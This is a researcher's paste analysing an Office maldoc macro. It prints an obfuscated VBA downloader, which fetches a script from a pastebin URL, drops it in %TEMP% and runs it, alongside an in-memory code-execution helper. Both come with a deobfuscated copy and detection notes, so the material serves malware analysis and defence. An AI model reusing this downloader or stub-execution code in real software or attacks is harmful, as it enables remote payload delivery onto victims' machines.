
Extracted + deobfuscated macro

bartblaze May 8th, 2015 (edited) 531 Never
Obfuscated + deobfuscated VBscript used in the latest Office maldoc campaign.
Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html


<== obfuscated: ===>
  ' Analysis note: a generic "call any Win32 API by name" primitive. It resolves
  ' sLib!sMod at run time, writes a small machine-code stub into the Byte array
  ' VAMMdgjbzOHrZ one RtlMoveMemory call at a time, and then executes that stub by
  ' handing its address to CallWindowProcA. No string obfuscation is used here, so
  ' the "deobfuscated" copy further down the page is byte-identical.
  ' The Declare statements for LoadLibraryA, GetProcAddress, RtlMoveMemory and
  ' CallWindowProcA are not part of this paste; they must exist elsewhere in the
  ' VBA project for this to compile.
  ' Detection value: a VBA project importing exactly that API quartet, and
  ' CallWindowProcA receiving a VarPtr into a Byte array instead of a window
  ' procedure, is a strong in-memory-execution signal independent of sLib/sMod.
  ' This function is not called from the downloader Sub shown on this page; which
  ' stage uses it is not visible here.
  ' Params: the arguments to hand to the target API; each is coerced to Long.
  ' Returns: whatever CallWindowProcA returns from the stub, or 0 when the
  ' target could not be resolved.
  6. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  ' Every runtime error is swallowed: an unresolvable API name simply yields 0 via
  ' the Exit Function below, and a fault inside the stub is not caught by this at all.
  7. On Error Resume Next
      ' Write cursor that advances through the stub buffer.
  8.     Dim UpICsYhhglV                As Long
      ' &HEC00 bytes (~60 KiB) of buffer for a stub that is only a few dozen bytes long.
  9.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  10.     Dim wZdrB                   As Long
      ' Resolved address of sLib!sMod.
  11.     Dim kQJlHFiPhSQwQic                As Long
  12.    
      ' LoadLibraryA loads the DLL if it is not already mapped, so any library can be targeted.
  13.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  14.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  15.    
      ' Code is written into an ordinary data array; whether it is later allowed to
      ' execute depends on the host process's DEP policy, which is not visible here.
  16.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
      ' Opcode bytes forming the stub prologue; they presumably discard the four
      ' placeholder arguments CallWindowProcA pushes - confirm in a disassembler.
  17.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  18.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
      ' Parameters are emitted last-to-first, i.e. pushed right-to-left as the
      ' Win32 calling convention expects; &H68 precedes each 4-byte value.
  19.     For wZdrB = UBound(Params) To 0 Step -1
  20.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  21.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  22.     Next
      ' &HE8 plus a 4-byte displacement computed as (target address) minus (address
      ' just past the displacement field): a relative call into the resolved API.
  23.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  24.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
      ' &HC3 terminates the stub so control returns to CallWindowProcA's caller.
  25.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
      ' Execution: CallWindowProcA treats its first argument as a function pointer
      ' and calls it with four zeroes. This is the line to hook or alert on.
  26.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  27.    
  28. End Function
  ' Analysis note: the downloader stage. Every literal is assembled from Chr$()
  ' calls so that plain-string signatures ("MSXML2.XMLHTTP", "http://", ".vbs")
  ' never appear in the module; the decoded value is given next to each line.
  ' Behaviour: synchronous HTTP GET of a second stage -> response text written to
  ' %TEMP%\JGuigbjbff3f.vbs -> that file opened through Shell.Application, which
  ' runs it with the registered .vbs handler (normally wscript.exe).
  ' No Auto_Open / Document_Open hook is visible in this paste, so the trigger
  ' for this Sub is not shown.
  ' Telemetry worth alerting on: an Office process making an outbound request to
  ' pastebin.com/download.php, creating a .vbs under %TEMP%, and spawning the
  ' script host. Blocking Office child-process creation (e.g. an ASR rule) or
  ' disabling macros from Internet-sourced documents stops this chain before
  ' the second stage ever runs.
  30. Sub hfyuBJKfdgfdgsdfg()
  ' Decodes to: http://pastebin.com/download.php?i=VTd9HVkz
  31. ouIYHiogeffjgyuFUFYdsg = Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) & Chr$(112) & Chr$(97) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(98) & Chr$(105) & Chr$(110) & Chr$(46) & Chr$(99) & Chr$(111) & Chr$(109) & Chr$(47) & Chr$(100) & Chr$(111) & Chr$(119) & Chr$(110) & Chr$(108) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(46) & Chr$(112) & Chr$(104) & Chr$(112) & Chr$(63) & Chr$(105) & Chr$(61) & Chr$(86) & Chr$(84) & Chr$(100) & Chr$(57) & Chr$(72) & Chr$(86) & Chr$(107) & Chr$(122)
  ' Decodes to: CreateObject("MSXML2.XMLHTTP")
  32. Set ertertFFFg = CreateObject(Chr$(77) & Chr$(83) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(50) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  ' Decodes to: .Open("GET", url, False) - the False makes the request synchronous,
  ' so ResponseText below is complete when read.
  33. Call ertertFFFg.Open(Chr$(71) & Chr$(69) & Chr$(84), ouIYHiogeffjgyuFUFYdsg, False)
  34. ertertFFFg.Send
  ' Decodes to: CreateObject("Scripting.FileSystemObject")
  35. Set iyuiyui = CreateObject(Chr$(83) & Chr$(99) & Chr$(114) & Chr$(105) & Chr$(112) & Chr$(116) & Chr$(105) & Chr$(110) & Chr$(103) & Chr$(46) & Chr$(70) & Chr$(105) & Chr$(108) & Chr$(101) & Chr$(83) & Chr$(121) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(109) & Chr$(79) & Chr$(98) & Chr$(106) & Chr$(101) & Chr$(99) & Chr$(116))
  ' Decodes to: Environ("TEMP") & "\JGuigbjbff3f.vbs" - the drop path.
  36.    ewwfgfdg = Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  ' Second argument is the overwrite flag (any nonzero value is True), so an
  ' existing file at the path is replaced.
  37. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  ' The response body is written verbatim: the second stage is a plain-text script.
  38. riitiyiFF.Write ertertFFFg.ResponseText
  39. riitiyiFF.Close
  ' Decodes to: CreateObject("Shell.Application")
  40. Set oUIYYytgsdvfFF = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
  ' Same path rebuilt again (Environ("TEMP") & "\JGuigbjbff3f.vbs"); .Open launches
  ' the dropped script via its file association - this is the process-creation event.
  41. oUIYYytgsdvfFF.Open Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  42. End Sub

=========================================================================================================



<== deobfuscated: ===>
  ' Analysis note: this function contains no Chr$()-encoded strings, so the
  ' deobfuscation pass had nothing to change and this copy is identical to the
  ' obfuscated one. It is a generic API-call primitive: resolve sLib!sMod, write
  ' a small machine-code stub into the Byte array VAMMdgjbzOHrZ, execute it via
  ' CallWindowProcA. The Declare statements for LoadLibraryA, GetProcAddress,
  ' RtlMoveMemory and CallWindowProcA are not in this paste.
  ' Detection value: that API quartet in a VBA project plus CallWindowProcA
  ' receiving a VarPtr into a Byte array is a strong in-memory-execution signal.
  ' Params: arguments for the target API, each coerced to Long.
  ' Returns: the stub's (i.e. the target API's) result, or 0 if unresolved.
  49. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  ' Silences every runtime error, including faults raised while the stub runs.
  50. On Error Resume Next
      ' Write cursor into the stub buffer.
  51.     Dim UpICsYhhglV                As Long
      ' Oversized (&HEC00 bytes) buffer for a stub of a few dozen bytes.
  52.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  53.     Dim wZdrB                   As Long
      ' Resolved address of sLib!sMod.
  54.     Dim kQJlHFiPhSQwQic                As Long
  55.  
  56.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  57.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  58.  
  59.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
      ' Stub prologue bytes; presumably clear CallWindowProcA's four placeholder
      ' arguments from the stack - confirm in a disassembler.
  60.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  61.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
      ' Arguments emitted last-to-first (right-to-left push order), &H68 before each.
  62.     For wZdrB = UBound(Params) To 0 Step -1
  63.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  64.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  65.     Next
      ' &HE8 with a displacement of target minus (address past the 4-byte field):
      ' a relative call to the resolved API.
  66.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  67.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
      ' &HC3 ends the stub and returns control to CallWindowProcA's caller.
  68.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
      ' CallWindowProcA calls the buffer as if it were a window procedure; the
      ' line to hook or alert on.
  69.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  70.  
  71. End Function
  ' Analysis note: deobfuscated downloader stage. The deobfuscation pass replaced
  ' each Chr$() chain with its plaintext but dropped the surrounding quotes and
  ' the "&" concatenation, so several lines below are not valid VBA as written;
  ' the properly quoted form is given in the comments. This listing is a reading
  ' aid, not a runnable macro.
  ' Chain: HTTP GET -> write response to %TEMP%\JGuigbjbff3f.vbs -> open it via
  ' Shell.Application (runs under the .vbs handler, normally wscript.exe).
  ' Indicators for defenders: Office process -> pastebin.com/download.php request,
  ' .vbs created in %TEMP%, Office spawning the script host. An ASR rule blocking
  ' Office child processes, or macro blocking for Internet-sourced files, breaks
  ' the chain before the second stage runs. No trigger (Auto_Open etc.) is shown.
  73. Sub hfyuBJKfdgfdgsdfg()
  ' i.e. ouIYHiogeffjgyuFUFYdsg = "http://pastebin.com/download.php?i=VTd9HVkz"
  74. ouIYHiogeffjgyuFUFYdsg = http://pastebin.com/download.php?i=VTd9HVkz
  ' i.e. CreateObject("MSXML2.XMLHTTP")
  75. Set ertertFFFg = CreateObject(MSXML2.XMLHTTP)
  ' i.e. .Open("GET", url, False) - synchronous, so ResponseText is complete below.
  76. Call ertertFFFg.Open(GET, ouIYHiogeffjgyuFUFYdsg, False)
  77. ertertFFFg.Send
  ' i.e. CreateObject("Scripting.FileSystemObject")
  78. Set iyuiyui = CreateObject(Scripting.FileSystemObject)
  ' i.e. ewwfgfdg = Environ("TEMP") & "\JGuigbjbff3f.vbs" - the drop path.
  79.    ewwfgfdg = Environ(TEMP)\JGuigbjbff3f.vbs
  ' Second argument is the overwrite flag (nonzero = True).
  80. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  ' Response body written verbatim: the second stage is a plain-text script.
  81. riitiyiFF.Write ertertFFFg.ResponseText
  82. riitiyiFF.Close
  ' i.e. CreateObject("Shell.Application")
  83. Set oUIYYytgsdvfFF = CreateObject(Shell.Application)
  ' i.e. .Open Environ("TEMP") & "\JGuigbjbff3f.vbs" - launches the dropped script
  ' through its file association; this is the process-creation event to alert on.
  84. oUIYYytgsdvfFF.Open Environ(TEMP)\JGuigbjbff3f.vbs
  85. End Sub